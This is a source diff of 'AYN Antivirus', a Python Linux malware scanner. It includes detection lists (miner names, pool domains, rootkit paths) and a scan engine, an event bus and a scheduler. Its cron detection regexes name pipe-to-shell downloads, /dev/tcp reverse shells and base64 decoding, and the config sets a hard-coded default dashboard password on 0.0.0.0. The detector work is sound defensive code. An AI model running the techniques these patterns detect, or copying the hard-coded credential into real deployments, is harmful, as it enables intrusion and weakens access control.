".rb",
".js",
".exe",
".elf",
".bin",
".so",
".dll",
]
# --- Crypto Miner Process Names ---
CRYPTO_MINER_PROCESS_NAMES = [
"xmrig",
"minerd",
"cpuminer",
"ethminer",
"claymore",
"phoenixminer",
"nbminer",
"t-rex",
"gminer",
"lolminer",
"bfgminer",
"cgminer",
"ccminer",
"nicehash",
"excavator",
"nanominer",
"teamredminer",
"wildrig",
"srbminer",
"xmr-stak",
"randomx",
"cryptonight",
]
# --- Crypto Pool Domains ---
CRYPTO_POOL_DOMAINS = [
"pool.minergate.com",
"xmrpool.eu",
"nanopool.org",
"mining.pool.observer",
"supportxmr.com",
"pool.hashvault.pro",
"moneroocean.stream",
"minexmr.com",
"herominers.com",
"2miners.com",
"f2pool.com",
"ethermine.org",
"unmineable.com",
"nicehash.com",
"prohashing.com",
"zpool.ca",
"miningpoolhub.com",
]
# --- Suspicious Mining Ports ---
SUSPICIOUS_PORTS = [
3333,
4444,
5555,
7777,
8888,
9999,
14433,
14444,
45560,
45700,
]
# --- Known Rootkit Files ---
KNOWN_ROOTKIT_FILES = [
"/usr/lib/libproc.so",
"/usr/lib/libext-2.so",
"/usr/lib/libns2.so",
"/usr/lib/libpam.so.1",
"/dev/shm/.x",
"/dev/shm/.r",
"/tmp/.ICE-unix/.x",
"/tmp/.X11-unix/.x",
"/usr/bin/sourcemask",
"/usr/bin/sshd2",
"/usr/sbin/xntpd",
"/etc/cron.d/.hidden",
"/var/tmp/.bash_history",
]
# --- Suspicious Cron Patterns ---
SUSPICIOUS_CRON_PATTERNS = [
r"curl\s+.*\|\s*sh",
r"wget\s+.*\|\s*sh",
r"curl\s+.*\|\s*bash",
r"wget\s+.*\|\s*bash",
r"/dev/tcp/",
r"base64\s+--decode",
r"xmrig",
r"minerd",
r"cryptonight",
r"\bcurl\b.*-o\s*/tmp/",
r"\bwget\b.*-O\s*/tmp/",
r"nohup\s+.*&",
r"/dev/null\s+2>&1",
]
# --- Malicious Environment Variables ---
MALICIOUS_ENV_VARS = [
"LD_PRELOAD",
"LD_LIBRARY_PATH",
"LD_AUDIT",
"LD_DEBUG",
"HISTFILE=/dev/null",
"PROMPT_COMMAND",
"BASH_ENV",
"ENV",
"CDPATH",
]
# --- Dashboard ---
DEFAULT_DASHBOARD_HOST = "0.0.0.0"
DEFAULT_DASHBOARD_PORT = 7777
DEFAULT_DASHBOARD_DB_PATH = "/var/lib/ayn-antivirus/dashboard.db"
DASHBOARD_COLLECTOR_INTERVAL = 10 # seconds between metric samples
DASHBOARD_REFRESH_INTERVAL = 30 # JS auto-refresh seconds
DASHBOARD_MAX_THREATS_DISPLAY = 50
DASHBOARD_MAX_LOG_LINES = 20
DASHBOARD_SCAN_HISTORY_DAYS = 30
DASHBOARD_METRIC_RETENTION_HOURS = 168 # 7 days
# Dashboard authentication
DEFAULT_DASHBOARD_USERNAME = "admin"
DEFAULT_DASHBOARD_PASSWORD = "ayn@2024"

View File

@@ -0,0 +1,917 @@
"""Core scan engine for AYN Antivirus.
Orchestrates file-system, process, and network scanning by delegating to
pluggable detectors (hash lookup, YARA, heuristic) and emitting events via
the :mod:`event_bus`.
"""
from __future__ import annotations
import logging
import os
import time
import uuid
from concurrent.futures import ThreadPoolExecutor, as_completed
from dataclasses import dataclass, field
from datetime import datetime
from enum import Enum, auto
from pathlib import Path
from typing import Any, Callable, Dict, List, Optional, Protocol
from ayn_antivirus.config import Config
from ayn_antivirus.core.event_bus import EventType, event_bus
from ayn_antivirus.utils.helpers import hash_file as _hash_file_util
logger = logging.getLogger(__name__)
# ---------------------------------------------------------------------------
# Enums
# ---------------------------------------------------------------------------
class ThreatType(Enum):
"""Classification of a detected threat."""
VIRUS = auto()
MALWARE = auto()
SPYWARE = auto()
MINER = auto()
ROOTKIT = auto()
class Severity(Enum):
"""Threat severity level, ordered low → critical."""
LOW = 1
MEDIUM = 2
HIGH = 3
CRITICAL = 4
class ScanType(Enum):
"""Kind of scan that was executed."""
FULL = "full"
QUICK = "quick"
DEEP = "deep"
SINGLE_FILE = "single_file"
TARGETED = "targeted"
# ---------------------------------------------------------------------------
# Data classes
# ---------------------------------------------------------------------------
@dataclass
class ThreatInfo:
"""A single threat detected during a file scan."""
path: str
threat_name: str
threat_type: ThreatType
severity: Severity
detector_name: str
details: str = ""
timestamp: datetime = field(default_factory=datetime.utcnow)
file_hash: str = ""
@dataclass
class FileScanResult:
"""Result of scanning a single file."""
path: str
scanned: bool = True
file_hash: str = ""
size: int = 0
threats: List[ThreatInfo] = field(default_factory=list)
error: Optional[str] = None
@property
def is_clean(self) -> bool:
return len(self.threats) == 0 and self.error is None
@dataclass
class ProcessThreat:
"""A suspicious process discovered at runtime."""
pid: int
name: str
cmdline: str
cpu_percent: float
memory_percent: float
threat_type: ThreatType
severity: Severity
details: str = ""
@dataclass
class NetworkThreat:
"""A suspicious network connection."""
local_addr: str
remote_addr: str
pid: Optional[int]
process_name: str
threat_type: ThreatType
severity: Severity
details: str = ""
@dataclass
class ScanResult:
"""Aggregated result of a path / multi-file scan."""
scan_id: str = field(default_factory=lambda: uuid.uuid4().hex[:12])
start_time: datetime = field(default_factory=datetime.utcnow)
end_time: Optional[datetime] = None
files_scanned: int = 0
files_skipped: int = 0
threats: List[ThreatInfo] = field(default_factory=list)
scan_path: str = ""
scan_type: ScanType = ScanType.FULL
@property
def duration_seconds(self) -> float:
if self.end_time is None:
return 0.0
return (self.end_time - self.start_time).total_seconds()
@property
def is_clean(self) -> bool:
return len(self.threats) == 0
@dataclass
class ProcessScanResult:
"""Aggregated result of a process scan."""
processes_scanned: int = 0
threats: List[ProcessThreat] = field(default_factory=list)
scan_duration: float = 0.0
@property
def total_processes(self) -> int:
"""Alias for processes_scanned (backward compat)."""
return self.processes_scanned
@property
def is_clean(self) -> bool:
return len(self.threats) == 0
@dataclass
class NetworkScanResult:
"""Aggregated result of a network scan."""
connections_scanned: int = 0
threats: List[NetworkThreat] = field(default_factory=list)
scan_duration: float = 0.0
@property
def total_connections(self) -> int:
"""Alias for connections_scanned (backward compat)."""
return self.connections_scanned
@property
def is_clean(self) -> bool:
return len(self.threats) == 0
@dataclass
class FullScanResult:
"""Combined results from a full scan (files + processes + network + containers)."""
file_scan: ScanResult = field(default_factory=ScanResult)
process_scan: ProcessScanResult = field(default_factory=ProcessScanResult)
network_scan: NetworkScanResult = field(default_factory=NetworkScanResult)
container_scan: Any = None # Optional[ContainerScanResult]
@property
def total_threats(self) -> int:
count = (
len(self.file_scan.threats)
+ len(self.process_scan.threats)
+ len(self.network_scan.threats)
)
if self.container_scan is not None:
count += len(self.container_scan.threats)
return count
@property
def is_clean(self) -> bool:
return self.total_threats == 0
# ---------------------------------------------------------------------------
# Detector protocol (for type hints & documentation)
# ---------------------------------------------------------------------------
class _Detector(Protocol):
"""Any object with a ``detect()`` method matching the BaseDetector API."""
def detect(
self,
file_path: str | Path,
file_content: Optional[bytes] = None,
file_hash: Optional[str] = None,
) -> list: ...
# ---------------------------------------------------------------------------
# Helper: file hashing
# ---------------------------------------------------------------------------
def _hash_file(filepath: Path, algo: str = "sha256") -> str:
"""Return the hex digest of *filepath*.
Delegates to :func:`ayn_antivirus.utils.helpers.hash_file`.
"""
return _hash_file_util(filepath, algo)
# ---------------------------------------------------------------------------
# Detector result → engine dataclass mapping
# ---------------------------------------------------------------------------
_THREAT_TYPE_MAP = {
"VIRUS": ThreatType.VIRUS,
"MALWARE": ThreatType.MALWARE,
"SPYWARE": ThreatType.SPYWARE,
"MINER": ThreatType.MINER,
"ROOTKIT": ThreatType.ROOTKIT,
"HEURISTIC": ThreatType.MALWARE,
}
_SEVERITY_MAP = {
"CRITICAL": Severity.CRITICAL,
"HIGH": Severity.HIGH,
"MEDIUM": Severity.MEDIUM,
"LOW": Severity.LOW,
}
def _map_threat_type(raw: str) -> ThreatType:
"""Convert a detector's threat-type string to :class:`ThreatType`."""
return _THREAT_TYPE_MAP.get(raw.upper(), ThreatType.MALWARE)
def _map_severity(raw: str) -> Severity:
"""Convert a detector's severity string to :class:`Severity`."""
return _SEVERITY_MAP.get(raw.upper(), Severity.MEDIUM)
# ---------------------------------------------------------------------------
# Quick-scan target directories
# ---------------------------------------------------------------------------
QUICK_SCAN_PATHS = [
"/tmp",
"/var/tmp",
"/dev/shm",
"/usr/local/bin",
"/var/spool/cron",
"/etc/cron.d",
"/etc/cron.daily",
"/etc/crontab",
"/var/www",
"/srv",
]
# ---------------------------------------------------------------------------
# ScanEngine
# ---------------------------------------------------------------------------
class ScanEngine:
"""Central orchestrator for all AYN scanning activities.
The engine walks the file system, delegates to pluggable detectors, tracks
statistics, and publishes events on the global :pydata:`event_bus`.
Parameters
----------
config:
Application configuration instance.
max_workers:
Thread pool size for parallel file scanning. Defaults to
``min(os.cpu_count(), 8)``.
"""
def __init__(self, config: Config, max_workers: int | None = None) -> None:
self.config = config
self.max_workers = max_workers or min(os.cpu_count() or 4, 8)
# Detector registry — populated by external plug-ins via register_detector().
        # Each detector implements detect(file_path, file_content=None, file_hash=None) -> list.
self._detectors: List[_Detector] = []
self._init_builtin_detectors()
# ------------------------------------------------------------------
# Detector registration
# ------------------------------------------------------------------
def register_detector(self, detector: _Detector) -> None:
"""Add a detector to the scanning pipeline."""
self._detectors.append(detector)
def _init_builtin_detectors(self) -> None:
"""Register all built-in detection engines."""
from ayn_antivirus.detectors.signature_detector import SignatureDetector
from ayn_antivirus.detectors.heuristic_detector import HeuristicDetector
from ayn_antivirus.detectors.cryptominer_detector import CryptominerDetector
from ayn_antivirus.detectors.spyware_detector import SpywareDetector
from ayn_antivirus.detectors.rootkit_detector import RootkitDetector
try:
sig_det = SignatureDetector(db_path=self.config.db_path)
self.register_detector(sig_det)
except Exception as e:
logger.warning("Failed to load SignatureDetector: %s", e)
try:
self.register_detector(HeuristicDetector())
except Exception as e:
logger.warning("Failed to load HeuristicDetector: %s", e)
try:
self.register_detector(CryptominerDetector())
except Exception as e:
logger.warning("Failed to load CryptominerDetector: %s", e)
try:
self.register_detector(SpywareDetector())
except Exception as e:
logger.warning("Failed to load SpywareDetector: %s", e)
try:
self.register_detector(RootkitDetector())
except Exception as e:
logger.warning("Failed to load RootkitDetector: %s", e)
if self.config.enable_yara:
try:
from ayn_antivirus.detectors.yara_detector import YaraDetector
yara_det = YaraDetector()
self.register_detector(yara_det)
except Exception as e:
logger.debug("YARA detector not available: %s", e)
logger.info("Registered %d detectors", len(self._detectors))
# ------------------------------------------------------------------
# File scanning
# ------------------------------------------------------------------
def scan_file(self, filepath: str | Path) -> FileScanResult:
"""Scan a single file through every registered detector.
Parameters
----------
filepath:
Absolute or relative path to the file.
Returns
-------
FileScanResult
"""
filepath = Path(filepath)
result = FileScanResult(path=str(filepath))
if not filepath.is_file():
result.scanned = False
result.error = "Not a file or does not exist"
return result
try:
stat = filepath.stat()
except OSError as exc:
result.scanned = False
result.error = str(exc)
return result
result.size = stat.st_size
if result.size > self.config.max_file_size:
result.scanned = False
result.error = f"File exceeds max size ({result.size} > {self.config.max_file_size})"
return result
# Hash the file — needed by hash-based detectors and for recording.
try:
result.file_hash = _hash_file(filepath)
except OSError as exc:
result.scanned = False
result.error = f"Cannot read file: {exc}"
return result
# Enrich with FileScanner metadata (type classification).
try:
from ayn_antivirus.scanners.file_scanner import FileScanner
file_scanner = FileScanner(max_file_size=self.config.max_file_size)
file_info = file_scanner.scan(str(filepath))
result._file_info = file_info # type: ignore[attr-defined]
except Exception:
logger.debug("FileScanner enrichment skipped for %s", filepath)
# Run every registered detector.
for detector in self._detectors:
try:
detections = detector.detect(filepath, file_hash=result.file_hash)
for d in detections:
threat = ThreatInfo(
path=str(filepath),
threat_name=d.threat_name,
threat_type=_map_threat_type(d.threat_type),
severity=_map_severity(d.severity),
detector_name=d.detector_name,
details=d.details,
file_hash=result.file_hash,
)
result.threats.append(threat)
except Exception:
logger.exception("Detector %r failed on %s", detector, filepath)
# Publish per-file events.
event_bus.publish(EventType.FILE_SCANNED, result)
if result.threats:
for threat in result.threats:
event_bus.publish(EventType.THREAT_FOUND, threat)
return result
# ------------------------------------------------------------------
# Path scanning (recursive)
# ------------------------------------------------------------------
def scan_path(
self,
path: str | Path,
recursive: bool = True,
quick: bool = False,
callback: Optional[Callable[[FileScanResult], None]] = None,
) -> ScanResult:
"""Walk *path* and scan every eligible file.
Parameters
----------
path:
Root directory (or single file) to scan.
recursive:
Descend into subdirectories.
quick:
If ``True``, only scan :pydata:`QUICK_SCAN_PATHS` that exist
under *path* (or the quick-scan list itself when *path* is ``/``).
callback:
Optional function called after each file is scanned — useful for
progress reporting.
Returns
-------
ScanResult
"""
scan_type = ScanType.QUICK if quick else ScanType.FULL
result = ScanResult(
scan_path=str(path),
scan_type=scan_type,
start_time=datetime.utcnow(),
)
event_bus.publish(EventType.SCAN_STARTED, {
"scan_id": result.scan_id,
"scan_type": scan_type.value,
"path": str(path),
})
# Collect files to scan.
files = self._collect_files(Path(path), recursive=recursive, quick=quick)
# Parallel scan.
with ThreadPoolExecutor(max_workers=self.max_workers) as pool:
futures = {pool.submit(self.scan_file, fp): fp for fp in files}
for future in as_completed(futures):
try:
file_result = future.result()
except Exception:
result.files_skipped += 1
logger.exception("Unhandled error scanning %s", futures[future])
continue
if file_result.scanned:
result.files_scanned += 1
else:
result.files_skipped += 1
result.threats.extend(file_result.threats)
if callback is not None:
try:
callback(file_result)
except Exception:
logger.exception("Scan callback raised an exception")
result.end_time = datetime.utcnow()
event_bus.publish(EventType.SCAN_COMPLETED, {
"scan_id": result.scan_id,
"files_scanned": result.files_scanned,
"threats": len(result.threats),
"duration": result.duration_seconds,
})
return result
# ------------------------------------------------------------------
# Process scanning
# ------------------------------------------------------------------
def scan_processes(self) -> ProcessScanResult:
"""Inspect all running processes for known miners and anomalies.
Delegates to :class:`~ayn_antivirus.scanners.process_scanner.ProcessScanner`
for detection and converts results to engine dataclasses.
Returns
-------
ProcessScanResult
"""
from ayn_antivirus.scanners.process_scanner import ProcessScanner
result = ProcessScanResult()
start = time.monotonic()
proc_scanner = ProcessScanner()
scan_data = proc_scanner.scan()
result.processes_scanned = scan_data.get("total", 0)
# Known miner matches.
for s in scan_data.get("suspicious", []):
threat = ProcessThreat(
pid=s["pid"],
name=s.get("name", ""),
cmdline=" ".join(s.get("cmdline") or []),
cpu_percent=s.get("cpu_percent", 0.0),
memory_percent=0.0,
threat_type=ThreatType.MINER,
severity=Severity.CRITICAL,
details=s.get("reason", "Known miner process"),
)
result.threats.append(threat)
event_bus.publish(EventType.THREAT_FOUND, threat)
# High-CPU anomalies (skip duplicates already caught as miners).
miner_pids = {t.pid for t in result.threats}
for h in scan_data.get("high_cpu", []):
if h["pid"] in miner_pids:
continue
threat = ProcessThreat(
pid=h["pid"],
name=h.get("name", ""),
cmdline=" ".join(h.get("cmdline") or []),
cpu_percent=h.get("cpu_percent", 0.0),
memory_percent=0.0,
threat_type=ThreatType.MINER,
severity=Severity.HIGH,
details=h.get("reason", "Abnormally high CPU usage"),
)
result.threats.append(threat)
event_bus.publish(EventType.THREAT_FOUND, threat)
# Hidden processes (possible rootkit).
for hp in scan_data.get("hidden", []):
threat = ProcessThreat(
pid=hp["pid"],
name=hp.get("name", ""),
cmdline=hp.get("cmdline", ""),
cpu_percent=0.0,
memory_percent=0.0,
threat_type=ThreatType.ROOTKIT,
severity=Severity.CRITICAL,
details=hp.get("reason", "Hidden process"),
)
result.threats.append(threat)
event_bus.publish(EventType.THREAT_FOUND, threat)
# Optional memory scan for suspicious PIDs.
try:
from ayn_antivirus.scanners.memory_scanner import MemoryScanner
mem_scanner = MemoryScanner()
suspicious_pids = {t.pid for t in result.threats}
for pid in suspicious_pids:
try:
mem_result = mem_scanner.scan(pid)
rwx_regions = mem_result.get("rwx_regions") or []
if rwx_regions:
result.threats.append(ProcessThreat(
pid=pid,
name="",
cmdline="",
cpu_percent=0.0,
memory_percent=0.0,
threat_type=ThreatType.ROOTKIT,
severity=Severity.HIGH,
details=(
f"Injected code detected in PID {pid}: "
f"{len(rwx_regions)} RWX region(s)"
),
))
except Exception:
pass # Memory scan for individual PID is best-effort
except Exception as exc:
logger.debug("Memory scan skipped: %s", exc)
result.scan_duration = time.monotonic() - start
return result
# ------------------------------------------------------------------
# Network scanning
# ------------------------------------------------------------------
def scan_network(self) -> NetworkScanResult:
"""Scan active network connections for mining pool traffic.
Delegates to :class:`~ayn_antivirus.scanners.network_scanner.NetworkScanner`
for detection and converts results to engine dataclasses.
Returns
-------
NetworkScanResult
"""
from ayn_antivirus.scanners.network_scanner import NetworkScanner
result = NetworkScanResult()
start = time.monotonic()
net_scanner = NetworkScanner()
scan_data = net_scanner.scan()
result.connections_scanned = scan_data.get("total", 0)
# Suspicious connections (mining pools, suspicious ports).
for s in scan_data.get("suspicious", []):
sev = _map_severity(s.get("severity", "HIGH"))
threat = NetworkThreat(
local_addr=s.get("local_addr", "?"),
remote_addr=s.get("remote_addr", "?"),
pid=s.get("pid"),
process_name=(s.get("process", {}) or {}).get("name", ""),
threat_type=ThreatType.MINER,
severity=sev,
details=s.get("reason", "Suspicious connection"),
)
result.threats.append(threat)
event_bus.publish(EventType.THREAT_FOUND, threat)
# Unexpected listening ports.
for lp in scan_data.get("unexpected_listeners", []):
threat = NetworkThreat(
local_addr=lp.get("local_addr", f"?:{lp.get('port', '?')}"),
remote_addr="",
pid=lp.get("pid"),
process_name=lp.get("process_name", ""),
threat_type=ThreatType.MALWARE,
severity=_map_severity(lp.get("severity", "MEDIUM")),
details=lp.get("reason", "Unexpected listener"),
)
result.threats.append(threat)
event_bus.publish(EventType.THREAT_FOUND, threat)
# Enrich with IOC database lookups — flag connections to known-bad IPs.
try:
from ayn_antivirus.signatures.db.ioc_db import IOCDatabase
ioc_db = IOCDatabase(self.config.db_path)
ioc_db.initialize()
malicious_ips = ioc_db.get_all_malicious_ips()
if malicious_ips:
import psutil as _psutil
already_flagged = {
t.remote_addr for t in result.threats
}
try:
for conn in _psutil.net_connections(kind="inet"):
if not conn.raddr:
continue
remote_ip = conn.raddr.ip
remote_str = f"{remote_ip}:{conn.raddr.port}"
if remote_ip in malicious_ips and remote_str not in already_flagged:
ioc_info = ioc_db.lookup_ip(remote_ip) or {}
result.threats.append(NetworkThreat(
local_addr=(
f"{conn.laddr.ip}:{conn.laddr.port}"
if conn.laddr else ""
),
remote_addr=remote_str,
pid=conn.pid or 0,
process_name=self._get_proc_name(conn.pid),
threat_type=ThreatType.MALWARE,
severity=Severity.CRITICAL,
details=(
f"Connection to known malicious IP {remote_ip} "
f"(threat: {ioc_info.get('threat_name', 'IOC match')})"
),
))
except (_psutil.AccessDenied, OSError):
pass
ioc_db.close()
except Exception as exc:
logger.debug("IOC network enrichment skipped: %s", exc)
result.scan_duration = time.monotonic() - start
return result
# ------------------------------------------------------------------
# Helpers
# ------------------------------------------------------------------
@staticmethod
def _get_proc_name(pid: int) -> str:
"""Best-effort process name lookup for a PID."""
if not pid:
return ""
try:
import psutil as _ps
return _ps.Process(pid).name()
except Exception:
return ""
# ------------------------------------------------------------------
# Container scanning
# ------------------------------------------------------------------
def scan_containers(
self,
runtime: str = "all",
container_id: Optional[str] = None,
):
"""Scan containers for threats.
Parameters
----------
runtime:
Container runtime to target (``"all"``, ``"docker"``,
``"podman"``, ``"lxc"``).
container_id:
If provided, scan only this specific container.
Returns
-------
ContainerScanResult
"""
from ayn_antivirus.scanners.container_scanner import ContainerScanner
scanner = ContainerScanner()
if container_id:
return scanner.scan_container(container_id)
return scanner.scan(runtime)
# ------------------------------------------------------------------
# Composite scans
# ------------------------------------------------------------------
def full_scan(
self,
callback: Optional[Callable[[FileScanResult], None]] = None,
) -> FullScanResult:
"""Run a complete scan: files, processes, and network.
Parameters
----------
callback:
Optional per-file progress callback.
Returns
-------
FullScanResult
"""
full = FullScanResult()
# File scan across all configured paths.
aggregate = ScanResult(scan_type=ScanType.FULL, start_time=datetime.utcnow())
for scan_path in self.config.scan_paths:
partial = self.scan_path(scan_path, recursive=True, quick=False, callback=callback)
aggregate.files_scanned += partial.files_scanned
aggregate.files_skipped += partial.files_skipped
aggregate.threats.extend(partial.threats)
aggregate.end_time = datetime.utcnow()
full.file_scan = aggregate
# Process + network.
full.process_scan = self.scan_processes()
full.network_scan = self.scan_network()
# Containers (best-effort — skipped if no runtimes available).
try:
container_result = self.scan_containers()
if container_result.containers_found > 0:
full.container_scan = container_result
except Exception:
logger.debug("Container scanning skipped", exc_info=True)
return full
def quick_scan(
self,
callback: Optional[Callable[[FileScanResult], None]] = None,
) -> ScanResult:
"""Scan only high-risk directories.
Targets :pydata:`QUICK_SCAN_PATHS` and any additional web roots
or crontab locations.
Returns
-------
ScanResult
"""
aggregate = ScanResult(scan_type=ScanType.QUICK, start_time=datetime.utcnow())
event_bus.publish(EventType.SCAN_STARTED, {
"scan_id": aggregate.scan_id,
"scan_type": "quick",
"paths": QUICK_SCAN_PATHS,
})
for scan_path in QUICK_SCAN_PATHS:
p = Path(scan_path)
if not p.exists():
continue
partial = self.scan_path(scan_path, recursive=True, quick=False, callback=callback)
aggregate.files_scanned += partial.files_scanned
aggregate.files_skipped += partial.files_skipped
aggregate.threats.extend(partial.threats)
aggregate.end_time = datetime.utcnow()
event_bus.publish(EventType.SCAN_COMPLETED, {
"scan_id": aggregate.scan_id,
"files_scanned": aggregate.files_scanned,
"threats": len(aggregate.threats),
"duration": aggregate.duration_seconds,
})
return aggregate
# ------------------------------------------------------------------
# Internal helpers
# ------------------------------------------------------------------
def _collect_files(
self,
root: Path,
recursive: bool = True,
quick: bool = False,
) -> List[Path]:
"""Walk *root* and return a list of scannable file paths.
Respects ``config.exclude_paths`` and ``config.max_file_size``.
"""
targets: List[Path] = []
if quick:
# In quick mode, only descend into known-risky subdirectories.
roots = [
root / rel
for rel in (
"tmp", "var/tmp", "dev/shm", "usr/local/bin",
"var/spool/cron", "etc/cron.d", "etc/cron.daily",
"var/www", "srv",
)
if (root / rel).exists()
]
# Also include the quick-scan list itself if root is /.
if str(root) == "/":
roots = [Path(p) for p in QUICK_SCAN_PATHS if Path(p).exists()]
else:
roots = [root]
exclude = set(self.config.exclude_paths)
for r in roots:
if r.is_file():
targets.append(r)
continue
iterator = r.rglob("*") if recursive else r.iterdir()
try:
for entry in iterator:
if not entry.is_file():
continue
# Exclude check.
entry_str = str(entry)
if any(entry_str.startswith(ex) for ex in exclude):
continue
try:
if entry.stat().st_size > self.config.max_file_size:
continue
except OSError:
continue
targets.append(entry)
except PermissionError:
logger.warning("Permission denied: %s", r)
return targets
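
The `_Detector` protocol above keeps the pipeline pluggable: any object with a matching `detect()` method can be handed to `register_detector()`. A minimal custom detector might look like the sketch below. The `Detection` container and the marker string are illustrative, not part of the real API; what matters is that returned objects expose the attributes `scan_file()` reads (`threat_name`, `threat_type`, `severity`, `detector_name`, `details`):

```python
from dataclasses import dataclass
from pathlib import Path
from typing import Optional


@dataclass
class Detection:
    """Illustrative detection record with the attributes scan_file() reads."""
    threat_name: str
    threat_type: str   # string form, mapped via _map_threat_type()
    severity: str      # string form, mapped via _map_severity()
    detector_name: str
    details: str


class MarkerDetector:
    """Toy detector: flags any file containing a hypothetical marker string."""

    MARKER = b"AYN-TEST-THREAT"  # illustrative marker, not a real signature

    def detect(
        self,
        file_path,
        file_content: Optional[bytes] = None,
        file_hash: Optional[str] = None,
    ) -> list:
        data = file_content
        if data is None:
            try:
                data = Path(file_path).read_bytes()
            except OSError:
                return []
        if self.MARKER in data:
            return [Detection(
                threat_name="Test.Marker",
                threat_type="MALWARE",
                severity="LOW",
                detector_name="MarkerDetector",
                details="illustrative marker string found",
            )]
        return []


# Hooking it into the pipeline (engine is a ScanEngine instance):
# engine.register_detector(MarkerDetector())
```

From there, `scan_file()` converts each returned record into a `ThreatInfo` and publishes `THREAT_FOUND` events automatically.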


@@ -0,0 +1,119 @@
"""Simple publish/subscribe event bus for AYN Antivirus.
Decouples the scan engine from consumers like the CLI, logger, quarantine
manager, and real-time monitor so each component can react to events
independently.
"""
from __future__ import annotations
import logging
import threading
from enum import Enum, auto
from typing import Any, Callable, Dict, List
logger = logging.getLogger(__name__)
# ---------------------------------------------------------------------------
# Event types
# ---------------------------------------------------------------------------
class EventType(Enum):
"""All events emitted by the AYN engine."""
THREAT_FOUND = auto()
SCAN_STARTED = auto()
SCAN_COMPLETED = auto()
FILE_SCANNED = auto()
SIGNATURE_UPDATED = auto()
QUARANTINE_ACTION = auto()
REMEDIATION_ACTION = auto()
DASHBOARD_METRIC = auto()
# Type alias for subscriber callbacks.
Callback = Callable[[EventType, Any], None]
# ---------------------------------------------------------------------------
# EventBus
# ---------------------------------------------------------------------------
class EventBus:
"""Thread-safe publish/subscribe event bus.
Usage::
bus = EventBus()
bus.subscribe(EventType.THREAT_FOUND, lambda et, data: print(data))
bus.publish(EventType.THREAT_FOUND, {"path": "/tmp/evil.elf"})
"""
def __init__(self) -> None:
self._subscribers: Dict[EventType, List[Callback]] = {et: [] for et in EventType}
self._lock = threading.Lock()
# ------------------------------------------------------------------
# Public API
# ------------------------------------------------------------------
def subscribe(self, event_type: EventType, callback: Callback) -> None:
"""Register *callback* to be invoked whenever *event_type* is published.
Parameters
----------
event_type:
The event to listen for.
callback:
A callable with signature ``(event_type, data) -> None``.
"""
with self._lock:
if callback not in self._subscribers[event_type]:
self._subscribers[event_type].append(callback)
def unsubscribe(self, event_type: EventType, callback: Callback) -> None:
"""Remove a previously-registered callback."""
with self._lock:
try:
self._subscribers[event_type].remove(callback)
except ValueError:
pass
def publish(self, event_type: EventType, data: Any = None) -> None:
"""Emit an event, invoking all registered callbacks synchronously.
Exceptions raised by individual callbacks are logged and swallowed so
that one faulty subscriber cannot break the pipeline.
Parameters
----------
event_type:
The event being emitted.
data:
Arbitrary payload — typically a dataclass or dict.
"""
with self._lock:
callbacks = list(self._subscribers[event_type])
for cb in callbacks:
try:
cb(event_type, data)
except Exception:
logger.exception(
"Subscriber %r raised an exception for event %s",
cb,
event_type.name,
)
def clear(self, event_type: EventType | None = None) -> None:
"""Remove all subscribers for *event_type*, or all subscribers if ``None``."""
with self._lock:
if event_type is None:
for et in EventType:
self._subscribers[et].clear()
else:
self._subscribers[event_type].clear()
# ---------------------------------------------------------------------------
# Module-level singleton
# ---------------------------------------------------------------------------
event_bus = EventBus()
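
The swallow-and-log behaviour of `publish()` is what keeps one faulty subscriber from starving the rest. A condensed standalone replica (class and names are illustrative, not the module above) demonstrates the semantics:

```python
import logging
from enum import Enum, auto
from typing import Any, Callable, Dict, List


class EventType(Enum):
    THREAT_FOUND = auto()


class MiniBus:
    """Condensed replica of EventBus.publish() semantics (illustrative)."""

    def __init__(self) -> None:
        self._subs: Dict[EventType, List[Callable]] = {et: [] for et in EventType}

    def subscribe(self, et: EventType, cb: Callable) -> None:
        self._subs[et].append(cb)

    def publish(self, et: EventType, data: Any = None) -> None:
        # Iterate over a copy so subscribers can (un)subscribe during dispatch.
        for cb in list(self._subs[et]):
            try:
                cb(et, data)
            except Exception:
                # Logged and swallowed: a faulty subscriber never breaks the pipeline.
                logging.getLogger(__name__).exception("subscriber failed")


def bad_subscriber(et, data):
    raise RuntimeError("boom")


seen: list = []
bus = MiniBus()
bus.subscribe(EventType.THREAT_FOUND, bad_subscriber)
bus.subscribe(EventType.THREAT_FOUND, lambda et, d: seen.append(d))
bus.publish(EventType.THREAT_FOUND, {"path": "/tmp/evil.elf"})
# The second subscriber still runs even though the first one raised.
```

The real `EventBus` adds a lock around subscription bookkeeping so the same guarantee holds across threads.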


@@ -0,0 +1,215 @@
"""Scheduler for recurring scans and signature updates.
Wraps the ``schedule`` library to provide cron-like recurring tasks that
drive the :class:`ScanEngine` and signature updater in a long-running
daemon loop.
"""
from __future__ import annotations
import logging
import time
from typing import Optional
import schedule
from ayn_antivirus.config import Config
from ayn_antivirus.core.engine import ScanEngine, ScanResult
from ayn_antivirus.core.event_bus import EventType, event_bus
logger = logging.getLogger(__name__)
# ---------------------------------------------------------------------------
# Cron expression helpers
# ---------------------------------------------------------------------------
def _parse_cron_field(field: str, min_val: int, max_val: int) -> list[int]:
"""Parse a single cron field (e.g. ``*/5``, ``1,3,5``, ``0-23``, ``*``).
Returns a sorted list of matching integer values.
"""
values: set[int] = set()
for part in field.split(","):
part = part.strip()
# */step
if part.startswith("*/"):
step = int(part[2:])
values.update(range(min_val, max_val + 1, step))
# range with optional step (e.g. 1-5 or 1-5/2)
elif "-" in part:
range_part, _, step_part = part.partition("/")
lo, hi = range_part.split("-", 1)
step = int(step_part) if step_part else 1
values.update(range(int(lo), int(hi) + 1, step))
# wildcard
elif part == "*":
values.update(range(min_val, max_val + 1))
# literal
else:
values.add(int(part))
return sorted(values)
def _cron_to_schedule(cron_expr: str) -> dict:
"""Convert a 5-field cron expression into components.
Returns a dict with keys ``minutes``, ``hours``, ``days``, ``months``,
``weekdays`` — each a list of integers.
Only *minute* and *hour* are used by the ``schedule`` library adapter
below; the rest are validated but not fully honoured (``schedule`` lacks
calendar-level granularity).
"""
parts = cron_expr.strip().split()
if len(parts) != 5:
raise ValueError(f"Expected 5-field cron expression, got: {cron_expr!r}")
return {
"minutes": _parse_cron_field(parts[0], 0, 59),
"hours": _parse_cron_field(parts[1], 0, 23),
"days": _parse_cron_field(parts[2], 1, 31),
"months": _parse_cron_field(parts[3], 1, 12),
"weekdays": _parse_cron_field(parts[4], 0, 6),
}
# ---------------------------------------------------------------------------
# Scheduler
# ---------------------------------------------------------------------------
class Scheduler:
"""Manages recurring scan and update jobs.
Parameters
----------
config:
Application configuration — used to build a :class:`ScanEngine` and
read schedule expressions.
engine:
Optional pre-built engine instance. If ``None``, one is created from
*config*.
"""
